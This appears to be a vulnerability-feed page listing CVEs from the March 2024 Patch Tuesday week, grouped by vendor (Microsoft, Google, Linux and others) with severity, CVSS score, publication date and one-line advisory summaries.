Patch Tuesday — March 2024

2024-03-12 · 706 CVEs

CVEs published or modified the week of 2024-03-12, partitioned by vendor.

Microsoft (70 CVEs)

CVESeverityCVSSKEVPublishedSummary
CVE-2024-21334Critical9.82024-03-12Open Management Infrastructure (OMI) Remote Code Execution Vulnerability
CVE-2024-21400Critical9.02024-03-12Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability
CVE-2024-26198High8.82024-03-12Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2024-26166High8.82024-03-12Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26165High8.82024-03-12Visual Studio Code Elevation of Privilege Vulnerability
CVE-2024-26164High8.82024-03-12Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability
CVE-2024-26162High8.82024-03-12Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26161High8.82024-03-12Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26159High8.82024-03-12Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-21451High8.82024-03-12Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-21450High8.82024-03-12Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21444High8.82024-03-12Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21441High8.82024-03-12Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21440High8.82024-03-12Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-21435High8.82024-03-12Windows OLE Remote Code Execution Vulnerability
CVE-2024-21411High8.82024-03-12Skype for Consumer Remote Code Execution Vulnerability
CVE-2024-0670High8.82024-03-11Privilege escalation in windows agent plugin in Checkmk before 2.2.0p23, 2.1.0p40 and 2.0.0 (EOL) allows local user to escalate privileges
CVE-2024-1222High8.62024-03-14This allows attackers to use a maliciously formed API request to gain access to an API authorization level with elevated privileges.
CVE-2020-11862High8.62024-03-13Allocation of Resources Without Limits or Throttling vulnerability in OpenText NetIQ Privileged Account Manager on Linux, Windows, 64 bit allows Flooding.This issue affects NetIQ Privileged Account Manager: before 3.7.0.2.
CVE-2024-21407High8.12024-03-12Windows Hyper-V Remote Code Execution Vulnerability
CVE-2024-26199High7.82024-03-12Microsoft Office Elevation of Privilege Vulnerability
CVE-2024-26182High7.82024-03-12Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26178High7.82024-03-12Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26176High7.82024-03-12Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26173High7.82024-03-12Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26170High7.82024-03-12Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability
CVE-2024-26169High7.8KEV2024-03-12Windows Error Reporting Service Elevation of Privilege Vulnerability
CVE-2024-21446High7.82024-03-12NTFS Elevation of Privilege Vulnerability
CVE-2024-21442High7.82024-03-12Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21437High7.82024-03-12Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-21436High7.82024-03-12Windows Installer Elevation of Privilege Vulnerability
CVE-2024-21434High7.82024-03-12Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability
CVE-2024-21431High7.82024-03-12Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability
CVE-2024-21426High7.82024-03-12Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-21418High7.82024-03-12Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability
CVE-2024-21330High7.82024-03-12Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability
CVE-2024-21419High7.62024-03-12Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2024-26204High7.52024-03-12Outlook for Android Information Disclosure Vulnerability
CVE-2024-26190High7.52024-03-12Microsoft QUIC Denial of Service Vulnerability
CVE-2024-21438High7.52024-03-12Microsoft AllJoyn API Denial of Service Vulnerability
CVE-2024-21427High7.52024-03-12Windows Kerberos Security Feature Bypass Vulnerability
CVE-2024-21421High7.52024-03-12Azure SDK Spoofing Vulnerability
CVE-2024-21392High7.52024-03-12.NET and Visual Studio Denial of Service Vulnerability
CVE-2024-26203High7.32024-03-12Azure Data Studio Elevation of Privilege Vulnerability
CVE-2024-21443High7.32024-03-12Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-1882High7.22024-03-14This vulnerability allows an already authenticated admin user to create a malicious payload that could be leveraged for remote code execution on the server hosting the PaperCut NG/MF application server.
CVE-2024-1654High7.22024-03-14This vulnerability potentially allows unauthorized write operations which may lead to remote code execution.
CVE-2024-21390High7.12024-03-12Microsoft Authenticator Elevation of Privilege Vulnerability
CVE-2024-21445High7.02024-03-12Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21439High7.02024-03-12Windows Telephony Server Elevation of Privilege Vulnerability
CVE-2024-21433High7.02024-03-12Windows Print Spooler Elevation of Privilege Vulnerability
CVE-2024-21432High7.02024-03-12Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-21429Medium6.82024-03-12Windows USB Hub Driver Remote Code Execution Vulnerability
CVE-2024-26201Medium6.62024-03-12Microsoft Intune Linux Agent Elevation of Privilege Vulnerability
CVE-2024-1884Medium6.52024-03-14This is a Server-Side Request Forgery (SSRF) vulnerability in the PaperCut NG/MF server-side module that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.
CVE-2024-26197Medium6.52024-03-12Windows Standards-Based Storage Management Service Denial of Service Vulnerability
CVE-2024-26185Medium6.52024-03-12Windows Compressed Folder Tampering Vulnerability
CVE-2024-1883Medium6.32024-03-14This is a reflected cross site scripting vulnerability in the PaperCut NG/MF application server.
CVE-2024-21430Medium5.72024-03-12Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability
CVE-2024-26181Medium5.52024-03-12Windows Kernel Denial of Service Vulnerability
CVE-2024-26177Medium5.52024-03-12Windows Kernel Information Disclosure Vulnerability
CVE-2024-26174Medium5.52024-03-12Windows Kernel Information Disclosure Vulnerability
CVE-2024-26160Medium5.52024-03-12Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
CVE-2024-21408Medium5.52024-03-12Windows Hyper-V Denial of Service Vulnerability
CVE-2024-20671Medium5.52024-03-12Microsoft Defender Security Feature Bypass Vulnerability
CVE-2024-21448Medium5.02024-03-12Microsoft Teams for Android Information Disclosure Vulnerability
CVE-2024-1223Medium4.82024-03-14This vulnerability potentially allows unauthorized enumeration of information from the embedded device APIs.
CVE-2024-26163Medium4.72024-03-14Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability
CVE-2024-27265Medium4.52024-03-14IBM Integration Bus for z/OS 10.1 through 10.1.0.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.
CVE-2024-26246Low3.92024-03-14Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

Other vendors (636 CVEs across 245 vendors)

Google · 57 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27228Critical9.82024-03-11there is a possible out of bounds write due to a heap buffer overflow.
CVE-2024-27227Critical9.82024-03-11A malicious DNS response can trigger a number of OOB reads, writes, and other memory issues
CVE-2024-0039Critical9.82024-03-11In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27207Critical9.12024-03-11Exported broadcast receivers allowing malicious apps to bypass broadcast protection.
CVE-2024-23717High8.82024-03-11In access_secure_service_from_temp_bond of btm_sec.cc, there is a possible way to achieve keystroke injection due to improper input validation.
CVE-2024-27236High8.42024-03-11In aoc_unlocked_ioctl of aoc.c, there is a possible memory corruption due to type confusion.
CVE-2024-27226High8.42024-03-11In tmu_config_gov_params of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27220High8.42024-03-11In lpm_req_handler of , there is a possible out of bounds memory access due to a missing bounds check.
CVE-2024-27219High8.42024-03-11In tmu_set_pi of tmu.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27213High8.42024-03-11In BroadcastSystemMessage of servicemgr.cpp, there is a possible Remote Code Execution due to a use after free.
CVE-2024-27209High8.42024-03-11there is a possible out of bounds write due to a heap buffer overflow.
CVE-2024-27208High8.42024-03-11there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27205High8.42024-03-11there is a possible memory corruption due to a use after free.
CVE-2024-27204High8.42024-03-11In tmu_set_gov_active of tmu.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-25993High8.42024-03-11In tmu_reset_tmu_trip_counter of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-25988High8.42024-03-11In SAEMM_DiscloseGuti of SAEMM_RadioMessageCodec.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-25985High8.42024-03-11In bigo_unlocked_ioctl of bigo.c, there is a possible UAF due to a missing bounds check.
CVE-2024-22005High8.42024-03-11there is a possible Authentication Bypass due to improperly used crypto.
CVE-2024-27233High7.82024-03-11In ppcfw_init_secpolicy of ppcfw.c, there is a possible permission bypass due to uninitialized data.
CVE-2024-27224High7.82024-03-11In strncpy of strncpy.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27222High7.82024-03-11In onSkipButtonClick of FaceEnrollFoldPage.java, there is a possible way to access the file the app cannot access due to Intent Redirect GRANT_URI_PERMISSIONS Attack.
CVE-2024-27221High7.82024-03-11In update_policy_data of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27212High7.82024-03-11In init_data of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-27210High7.82024-03-11In policy_check of fvp.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-25992High7.82024-03-11In tmu_tz_control of tmu.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-25986High7.82024-03-11In ppmp_unprotect_buf of drm_fw.c, there is a possible compromise of protected memory due to a logic error in the code.
CVE-2024-22008High7.82024-03-11In config_gov_time_windows of tmu.c, there is a possible out of bounds write due to a missing bounds check.
CVE-2024-0051High7.82024-03-11In onQueueFilled of SoftMPEG4.cpp, there is a possible out of bounds write due to a heap buffer overflow.
CVE-2024-0050High7.82024-03-11In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a missing validation check.
CVE-2024-0049High7.82024-03-11In multiple locations, there is a possible out of bounds write due to a heap buffer overflow.
CVE-2024-0048High7.82024-03-11In Session of AccountManagerService.java, there is a possible method to retain foreground service privileges due to incorrect handling of null responses.
CVE-2024-0046High7.82024-03-11In installExistingPackageAsUser of InstallPackageHelper.java, there is a possible carrier restriction bypass due to a logic error in the code.
CVE-2024-27211High7.72024-03-11In AtiHandleAPOMsgType of ati_Main.c, there is a possible OOB write due to a missing null check.
CVE-2024-27229High7.52024-03-11In ss_SendCallBarringPwdRequiredIndMsg of ss_CallBarring.c, there is a possible null pointer deref due to a missing null check.
CVE-2024-27206High7.52024-03-11there is a possible out of bounds read due to a missing bounds check.
CVE-2024-22011High7.52024-03-11In ss_ProcessRejectComponent of ss_MmConManagement.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-22009High7.12024-03-11In init_data of , there is a possible out of bounds write due to a missing bounds check.
CVE-2024-25987Medium6.72024-03-11In pt_sysctl_command of pt.c, there is a possible out of bounds write due to an incorrect bounds check.
CVE-2024-0044Medium6.72024-03-11In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation.
CVE-2024-0045Medium6.52024-03-11In smp_proc_sec_req of smp_act.cc, there is a possible out of bounds read due to improper input validation.
CVE-2024-25990Medium6.42024-03-11In pktproc_perftest_gen_rx_packet_sktbuf_mode of link_rx_pktproc.c, there is a possible out of bounds write due to a race condition.
CVE-2024-25984Medium6.22024-03-11In dumpBatteryDefend of dump_power.cpp, there is a possible out of bounds read due to a heap buffer overflow.
CVE-2024-22007Medium6.22024-03-11In constraint_check of fvp.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27234Medium5.92024-03-11In fvp_set_target of fvp.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-25989Medium5.92024-03-11In gpu_slc_liveness_update of pixel_gpu_slc.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27237Medium5.52024-03-11In wipe_ns_memory of nsmemwipe.c, there is a possible incorrect size calculation due to a logic error in the code.
CVE-2024-27235Medium5.52024-03-11In plugin_extern_func of , there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27218Medium5.52024-03-11In update_freq_data of , there is a possible out of bounds read due to a missing bounds check.
CVE-2024-22010Medium5.52024-03-11In dvfs_plugin_caller of fvp.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-0047Medium5.52024-03-11In writeUserLP of UserManagerService.java, device policies are serialized with an incorrect tag due to a logic error in the code.
CVE-2024-22006Medium5.32024-03-11OOB read in the TMU plugin that allows for memory disclosure in the power management subsystem of the device.
CVE-2024-27230Medium5.12024-03-11In ProtocolPsKeepAliveStatusAdapter::getCode() of protocolpsadapter.cpp, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27223Medium5.12024-03-11In EUTRAN_LCS_DecodeFacilityInformationElement of LPP_LcsManagement.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-27225Medium4.42024-03-11In sendHciCommand of bluetooth_hci.cc, there is a possible out of bounds read due to a heap buffer overflow.
CVE-2024-25991Low3.32024-03-11In acpm_tmu_ipc_handler of tmu_plugin.c, there is a possible out of bounds read due to a missing bounds check.
CVE-2024-0053Low3.32024-03-11In getCustomPrinterIcon of PrintManagerService.java, there is a possible way to view other user's images due to a confused deputy.
CVE-2024-0052Low3.32024-03-11In multiple functions of healthconnect, there is a possible leakage of exercise route data due to a missing permission check.

Linux · 48 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2021-47135High7.82024-03-15In the Linux kernel, the following vulnerability has been resolved: mt76: mt7921: fix possible AOOB issue in mt7921_mcu_tx_rate_report Fix possible array out of bound access in mt7921_mcu_tx_rate_report.
CVE-2021-47131High7.82024-03-15In the Linux kernel, the following vulnerability has been resolved: net/tls: Fix use-after-free after the TLS device goes down and up When a netdev with active TLS offload goes down, tls_device_down is called to stop the offload and tear…
CVE-2021-47123High7.82024-03-15In the Linux kernel, the following vulnerability has been resolved: io_uring: fix ltout double free on completion race Always remove linked timeout on io_link_timeout_fn() from the master request link list, otherwise we may get use-after…
CVE-2021-47118High7.82024-03-15In the Linux kernel, the following vulnerability has been resolved: pid: take a reference when initializing `cad_pid` During boot, kernel_init_freeable() initializes `cad_pid` to the init task's struct pid.
CVE-2021-47111High7.82024-03-15In the Linux kernel, the following vulnerability has been resolved: xen-netback: take a reference to the RX task thread Do this in order to prevent the task from being freed if the thread returns (which can be triggered by the frontend)…
CVE-2024-26619High7.82024-03-11In the Linux kernel, the following vulnerability has been resolved: riscv: Fix module loading free order Reverse order of kfree calls to resolve use-after-free error.
CVE-2024-26616High7.82024-03-11In the Linux kernel, the following vulnerability has been resolved: btrfs: scrub: avoid use-after-free when chunk length is not 64K aligned [BUG] There is a bug report that, on a ext4-converted btrfs, scrub leads to various problems, inc…
CVE-2024-26610High7.82024-03-11In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix a memory corruption iwl_fw_ini_trigger_tlv::data is a pointer to a __le32, which means that if we copy to iwl_fw_ini_trigger_tlv::data + offset while…
CVE-2024-26608High7.82024-03-11In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix global oob in ksmbd_nl_policy Similar to a reported issue (check the commit b33fb5b801c6 ("net: qualcomm: rmnet: fix global oob in rmnet_policy"), my local fu…
CVE-2023-52495High7.82024-03-11In the Linux kernel, the following vulnerability has been resolved: soc: qcom: pmic_glink_altmode: fix port sanity check The PMIC GLINK altmode driver currently supports at most two ports.
CVE-2023-52494High7.82024-03-11In the Linux kernel, the following vulnerability has been resolved: bus: mhi: host: Add alignment check for event ring read pointer Though we do check the event ring read pointer by "is_valid_ring_ptr" to make sure it is in the buffer ra…
CVE-2023-52491High7.82024-03-11In the Linux kernel, the following vulnerability has been resolved: media: mtk-jpeg: Fix use after free bug due to error path handling in mtk_jpeg_dec_device_run In mtk_jpeg_probe, &jpeg->job_timeout_work is bound with mtk_jpeg_job_timeo…
CVE-2024-26620High7.52024-03-11In the Linux kernel, the following vulnerability has been resolved: s390/vfio-ap: always filter entire AP matrix The vfio_ap_mdev_filter_matrix function is called whenever a new adapter or domain is assigned to the mdev.
CVE-2021-47132High7.12024-03-15In the Linux kernel, the following vulnerability has been resolved: mptcp: fix sk_forward_memory corruption on retransmission MPTCP sk_forward_memory handling is a bit special, as such field is protected by the msk socket spin_lock, inst…
CVE-2021-47110High7.12024-03-15In the Linux kernel, the following vulnerability has been resolved: x86/kvm: Disable kvmclock on all CPUs on shutdown Currenly, we disable kvmclock from machine_shutdown() hook and this only happens for boot CPU.
CVE-2024-26630High7.12024-03-13In the Linux kernel, the following vulnerability has been resolved: mm: cachestat: fix folio read-after-free in cache walk In cachestat, we access the folio from the page cache's xarray to compute its page offset, and check for its dirty…
CVE-2024-26617High7.02024-03-11In the Linux kernel, the following vulnerability has been resolved: fs/proc/task_mmu: move mmu notification mechanism inside mm lock Move mmu notification mechanism inside mm lock to prevent race condition in other components which depen…
CVE-2021-47134Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: efi/fdt: fix panic when no valid fdt found setup_arch() would invoke efi_init()->efi_get_fdt_params().
CVE-2021-47133Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: HID: amd_sfh: Fix memory leak in amd_sfh_work Kmemleak tool detected a memory leak in the amd_sfh driver.
CVE-2021-47128Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: bpf, lockdown, audit: Fix buggy SELinux lockdown permission checks Commit 59438b46471a ("security,lockdown,selinux: implement SELinux lockdown") added an implementation…
CVE-2021-47127Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: ice: track AF_XDP ZC enabled queues in bitmap Commit c7a219048e45 ("ice: Remove xsk_buff_pool from VSI structure") silently introduced a regression and broke the Tx side…
CVE-2021-47126Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix KASAN: slab-out-of-bounds Read in fib6_nh_flush_exceptions Reported by syzbot: HEAD commit: 90c911ad Merge tag 'fixes' of git://git.kernel.org/pub/scm..
CVE-2021-47125Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: sch_htb: fix refcount leak in htb_parent_to_leaf_offload The commit ae81feb7338c ("sch_htb: fix null pointer dereference on a null new_q") fixes a NULL pointer dereferen…
CVE-2021-47124Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: io_uring: fix link timeout refs WARNING: CPU: 0 PID: 10242 at lib/refcount.c:28 refcount_warn_saturate+0x15b/0x1a0 lib/refcount.c:28 RIP: 0010:refcount_warn_saturate+0x1…
CVE-2021-47122Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: net: caif: fix memory leak in caif_device_notify In case of caif_enroll_dev() fail, allocated link_support won't be assigned to the corresponding structure.
CVE-2021-47121Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: net: caif: fix memory leak in cfusbl_device_notify In case of caif_enroll_dev() fail, allocated link_support won't be assigned to the corresponding structure.
CVE-2021-47120Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: HID: magicmouse: fix NULL-deref on disconnect Commit 9d7b18668956 ("HID: magicmouse: add support for Apple Magic Trackpad 2") added a sanity check for an Apple trackpad…
CVE-2021-47119Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: ext4: fix memory leak in ext4_fill_super Buffer head references must be released before calling kill_bdev(); otherwise the buffer head (and its page referenced by b_data…
CVE-2021-47117Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: ext4: fix bug on in ext4_es_cache_extent as ext4_split_extent_at failed We got follow bug_on when run fsstress with injecting IO fault: [130747.323114] kernel BUG at fs/…
CVE-2021-47116Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: ext4: fix memory leak in ext4_mb_init_backend on error path.
CVE-2021-47114Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix data corruption by fallocate When fallocate punches holes out of inode size, if original isize is in the middle of last cluster, then the part from isize to t…
CVE-2021-47113Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: btrfs: abort in rename_exchange if we fail to insert the second ref Error injection stress uncovered a problem where we'd leave a dangling inode ref if we failed during…
CVE-2021-47112Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: x86/kvm: Teardown PV features on boot CPU as well Various PV features (Async PF, PV EOI, steal time) work through memory shared with hypervisor and when we restore from…
CVE-2021-47109Medium5.52024-03-15In the Linux kernel, the following vulnerability has been resolved: neighbour: allow NUD_NOARP entries to be forced GCed IFF_POINTOPOINT interfaces use NUD_NOARP entries for IPv6.
CVE-2024-26629Medium5.52024-03-13In the Linux kernel, the following vulnerability has been resolved: nfsd: fix RELEASE_LOCKOWNER The test on so_count in nfsd4_release_lockowner() is nonsense and harmful.
CVE-2024-26618Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: arm64/sme: Always exit sme_alloc() early with existing storage When sme_alloc() is called with existing storage and we are not flushing we will always allocate new stora…
CVE-2024-26615Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: net/smc: fix illegal rmb_desc access in SMC-D connection dump A crash was found when dumping SMC-D connections.
CVE-2024-26612Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: netfs, fscache: Prevent Oops in fscache_put_cache() This function dereferences "cache" and then checks if it's IS_ERR_OR_NULL().
CVE-2024-26611Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: xsk: fix usage of multi-buffer BPF helpers for ZC XDP Currently when packet is shrunk via bpf_xdp_adjust_tail() and memory type is set to MEM_TYPE_XSK_BUFF_POOL, null pt…
CVE-2023-52498Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: PM: sleep: Fix possible deadlocks in core system-wide PM code It is reported that in low-memory situations the system-wide resume core code deadlocks, because async_sche…
CVE-2023-52493Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: bus: mhi: host: Drop chan lock before queuing buffers Ensure read and write locks for the channel are not taken in succession by dropping the read lock from parse_xfer_e…
CVE-2023-52490Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: mm: migrate: fix getting incorrect page mapping during page migration When running stress-ng testing, we found below kernel crash after a few hours: Unable to handle ke…
CVE-2023-52488Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO The SC16IS7XX IC supports a burst mode to access the FIFOs where the initial register address…
CVE-2023-52487Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix peer flow lists handling The cited change refactored mlx5e_tc_del_fdb_peer_flow() to only clear DUP flag when list of peer flows has become empty.
CVE-2023-52486Medium5.52024-03-11In the Linux kernel, the following vulnerability has been resolved: drm: Don't unref the same fb many times by mistake due to deadlock handling If we get a deadlock after the fb lookup in drm_mode_page_flip_ioctl() we proceed to unref th…
CVE-2023-52608Medium4.72024-03-13In the Linux kernel, the following vulnerability has been resolved: firmware: arm_scmi: Check mailbox/SMT channel for consistency On reception of a completion interrupt the shared memory area is accessed to retrieve the message header at…
CVE-2021-47129Medium4.62024-03-15In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: skip expectations for confirmed conntrack nft_ct_expect_obj_eval() calls nf_ct_ext_add() for a confirmed conntrack entry.
CVE-2021-47130Medium4.42024-03-15In the Linux kernel, the following vulnerability has been resolved: nvmet: fix freeing unallocated p2pmem In case p2p device was found but the p2p pool is empty, the nvme target is still trying to free the sgl from the p2p pool instead o…

N/a · 44 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28354Critical10.02024-03-15There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01.
CVE-2024-25139Critical10.02024-03-14In TP-Link Omada er605 1.0.1 through (v2.6) 2.2.3, a cloud-brd binary is susceptible to an integer overflow that leads to a heap-based buffer overflow.
CVE-2024-28383Critical9.82024-03-14Tenda AX12 v1.0 v22.03.01.16 was discovered to contain a stack overflow via the ssid parameter in the sub_431CF0 function.
CVE-2024-28388Critical9.82024-03-14SQL injection vulnerability in SunnyToo stproductcomments module for PrestaShop v.1.0.5 and before, allows a remote attacker to escalate privileges and obtain sensitive information via the StProductCommentClass::getListcomments method.
CVE-2024-28553Critical9.82024-03-12Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the entrys parameter fromAddressNat function.
CVE-2024-28535Critical9.82024-03-12Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the mitInterface parameter of fromAddressNat function.
CVE-2024-25331Critical9.32024-03-12DIR-822 Rev.
CVE-2024-26503Critical9.12024-03-14Unrestricted File Upload vulnerability in Greek Universities Network Open eClass v.3.15 and earlier allows attackers to run arbitrary code via upload of crafted file to certbadge.php endpoint.
CVE-2024-28353High8.82024-03-15There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01.
CVE-2023-50677High8.82024-03-14An issue in NETGEAR-DGND4000 v.1.1.00.15_1.00.15 allows a remote attacker to escalate privileges via the next_file parameter to the /setup.cgi component.
CVE-2024-28424High8.82024-03-14zenml v0.55.4 was discovered to contain an arbitrary file upload vulnerability in the load function at /materializers/cloudpickle_materializer.py.
CVE-2024-25228High8.82024-03-14Vinchin Backup and Recovery 7.2 and Earlier is vulnerable to Authenticated Remote Code Execution (RCE) via the getVerifydiyResult function in ManoeuvreHandler.class.php.
CVE-2024-27758High8.42024-03-12In RPyC before 6.0.0, when a server exposes a method that calls the attribute named __array__ for a client-provided netref (e.g., np.array(client_netref)), a remote attacker can craft a class that results in remote code execution.
CVE-2024-28404High8.02024-03-15TOTOLINK X2000R before V1.0.0-B20231213.1013 contains a Stored Cross-site scripting (XSS) vulnerability in MAC Filtering under the Firewall Page.
CVE-2024-28338High8.02024-03-12A login bypass in TOTOLINK A8000RU V7.1cu.643_B20200521 allows attackers to login to Administrator accounts via providing a crafted session cookie.
CVE-2024-28340High7.52024-03-12An information leak in the currentsetting.htm component of Netgear CBR40 2.5.0.28, Netgear CBK40 2.5.0.28, and Netgear CBK43 2.5.0.28 allows attackers to obtain sensitive information without any authentication required.
CVE-2023-32666High7.22024-03-14On-chip debug and test interface with improper access control in some 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local ac…
CVE-2023-32282High7.22024-03-14Race condition in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-25325High7.12024-03-12SQL injection vulnerability in Employee Management System v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to the txtemail parameter in the login.php.
CVE-2024-28816High7.12024-03-11Student Information Chatbot a0196ab allows SQL injection via the username to the login function in index.php.
CVE-2023-35191Medium6.82024-03-14Uncontrolled resource consumption for some Intel(R) SPS firmware versions may allow a privileged user to potentially enable denial of service via network access.
CVE-2023-32633Medium6.72024-03-14Improper input validation in the Intel(R) CSME installer software before version 2328.5.5.0 may allow an authenticated user to potentially enable escalation of privilege via local access.
CVE-2023-28389Medium6.72024-03-14Incorrect default permissions in some Intel(R) CSME installer software before version 2328.5.5.0 may allow an authenticated user to potentially enable escalation of privilege via local access.
CVE-2023-39368Medium6.52024-03-14Protection mechanism failure of bus lock regulator for some Intel(R) Processors may allow an unauthenticated user to potentially enable denial of service via network access.
CVE-2023-28746Medium6.52024-03-14Information exposure through microarchitectural state after transient execution from some register files for some Intel(R) Atom(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
CVE-2024-28323Medium6.52024-03-14The bwdates-report-result.php file in Phpgurukul User Registration & Login and User Management System 3.1 contains a potential security vulnerability related to user input validation.
CVE-2024-28418Medium6.52024-03-14Webedition CMS 9.2.2.0 has a File upload vulnerability via /webEdition/we_cmd.php
CVE-2023-36238Medium6.52024-03-13Insecure Direct Object Reference (IDOR) in Bagisto v.1.5.1 allows an attacker to obtain sensitive information via the invoice ID parameter.
CVE-2024-28417Medium6.32024-03-14Webedition CMS 9.2.2.0 has a Stored XSS vulnerability via /webEdition/we_cmd.php.
CVE-2023-22655Medium6.12024-03-14Protection mechanism failure in some 3rd and 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-28623Medium6.12024-03-13RiteCMS v3.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component main_menu/edit_section.
CVE-2023-43292Medium6.12024-03-12Cross Site Scripting vulnerability in My Food Recipe Using PHP with Source Code v.1.0 allows a local attacker to execute arbitrary code via a crafted payload to the Recipe Name, Procedure, and ingredients parameters.
CVE-2023-49453Medium6.12024-03-12Reflected cross-site scripting (XSS) vulnerability in Racktables v0.22.0 and before, allows local attackers to execute arbitrary code and obtain sensitive information via the search component in index.php.
CVE-2024-28823Medium6.12024-03-11Amazon AWS aws-js-s3-explorer (aka AWS JavaScript S3 Explorer) 1.0.0 allows XSS via a crafted S3 bucket name to index.html.
CVE-2024-26475Medium5.52024-03-14An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.
CVE-2023-38575Medium5.52024-03-14Non-transparent sharing of return predictor targets between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.
